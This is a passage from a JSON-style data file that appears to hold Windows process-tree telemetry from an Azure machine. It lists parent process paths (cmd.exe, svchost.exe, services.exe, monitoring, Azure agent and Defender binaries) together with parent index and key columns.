:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\"],\"parent_index\":[\"NaN\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"170\",\"173\",\"170\",\"177\",\"177\",\"170\",\"179\",\"170\",\"183\",\"170\",\"185\",\"185\",\"170\",\"192\",\"170\",\"194\",\"170\",\"196\",\"170\",\"206\",\"170\",\"231\",\"170\",\"302\",\"170\",\"304\",\"304\",\"304\",\"170\",\"341\",\"170\",\"347\",\"170\",\"351\",\"170\",\"353\",\"170\",\"357\",\"170\",\"361\",\"170\",\"370\",\"170\",\"372\",\"170\",\"378\",\"170\",\"380\",\"170\",\"417\",\"170\",\"442\",\"170\",\"488\",\"170\",\"495\",\"170\",\"506\",\"170\",\"508\",\"170\",\"510\",\"170\",\"515\",\"170\",\"522\",\"170\",\"524\",\"170\",\"528\",\"170\",\"533\",\"170\",\"541\",\"170\",\"575\",\"170\",\"600\",\"170\",\"631\",\"170\",\"633\",\"170\",\"636\",\"170\",\"638\",\"170\",\"644\",\"170\",\"645\",\"170\",\"651\",\"170\",\"653\",\"170\",\"659\",\"170\",\"665\",\"170\",\"679\",\"170\",\"725\",\"170\",\"754\",\"170\",\"760\",\"170\",\"765\",\"170\",\"767\",\"170\",\"769\",\"170\",\"775\",\"170\",\"781\",\"170\",\"783\",\"170\",\"786\",\"170\",\"795\",\"170\",\"799\",\"170\",\"826\",\"170\",\"853\",\"170\",\"891\",\"170\",\"892\",\"170\",\"900\",\"170\",\"902\",\"170\",\"906\",\"170\",\"908\",\"170\",\"917\",\"170\",\"919\",\"170\",\"921\",\"170\",\"924\",\"170\",\"942\",\"170\",\"943\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"1000\",\"NaN\",\"1001\",\"1\",\"NaN\",\"1002\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"110\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"151\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"152\",\"163\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"164\",\"152\",\"152\",\"152\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"247\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"256\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"257\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"289\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"290\",\"248\",\"248\",\"248\",\"248\",\"248\",\"248\",\"142\",\"142\",\"142\",\"142\",\"142\",\"142\",\"1002\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"1002\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"33\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"34\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"24\",\"1002\",\"1002\",\"1002\",\"355\",\"1002\",\"1002\",\"1002\",\"1002\",\"375\",\"1002\",\"1002\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"398\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"399\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"433\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"444\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"445\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"434\",\"389\",\"389\",\"389\",\"389\",\"389\",\"389\",\"1002\",\"490\",\"490\",\"493\",\"1002\",\"1002\",\"500\",\"1002\",\"512\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"552\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"553\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"587\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"588\",\"543\",\"543\",\"543\",\"543\",\"543\",\"543\",\"1002\",\"1002\",\"1002\",\"1002\",\"663\",\"1002\",\"1002\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"681\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"682\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"714\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"715\",\"670\",\"670\",\"670\",\"670\",\"670\",\"670\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"811\",\"812\",\"812\",\"812\",\"812\",\"812\",\"817\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"812\",\"827\",\"812\",\"812\",\"812\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"848\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"849\",\"802\",\"802\",\"802\",\"802\",\"802\",\"802\",\"1002\",\"1002\",\"1002\",\"904\",\"1002\",\"1002\",\"1002\",\"1002\",\"1002\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"962\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"963\",\"933\",\"933\",\"933\",\"933\",\"933\",\"933\",\"NaN\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"1003\",\"NaN\",\"1004\",\"10\",\"1004\",\"107\",\"1004\",\"120\",\"1004\",\"127\",\"1004\",\"129\",\"1004\",\"139\",\"1004\",\"15\",\"1004\",\"5\",\"1004\",\"67\",\"1004\",\"76\",\"1004\",\"78\",\"1004\",\"8\",\"NaN\",\"1005\",\"12\",\"NaN\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"1006\",\"NaN\",\"1007\",\"103\",\"103\",\"105\",\"1007\",\"123\",\"1007\",\"134\",\"134\",\"136\",\"1007\",\"343\",\"343\",\"349\",\"1007\",\"364\",\"364\",\"366\",\"1007\",\"385\",\"385\",\"387\",\"1007\",\"502\",\"502\",\"504\",\"1007\",\"520\",\"520\",\"526\",\"1007\",\"530\",\"1007\",\"594\",\"594\",\"620\",\"1007\",\"640\",\"640\",\"642\",\"1007\",\"655\",\"655\",\"657\",\"1007\",\"69\",\"69\",\"74\",\"1007\",\"756\",\"756\",\"758\",\"1007\",\"771\",\"771\",\"773\",\"1007\",\"788\",\"1007\",\"791\",\"791\",\"793\",\"1007\",\"889\",\"889\",\"895\",\"1007\",\"910\",\"910\",\"912\",\"1007\",\"926\",\"926\",\"928\",\"NaN\",\"1008\",\"81\",\"81\",\"84\",\"97\",\"1008\",\"83\",\"83\",\"1008\",\"85\",\"1008\",\"1008\",\"94\",\"94\",\"NaN\",\"1009\",\"1009\",\"1009\",\"89\",\"90\",\"1009\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x270|1970-01-01 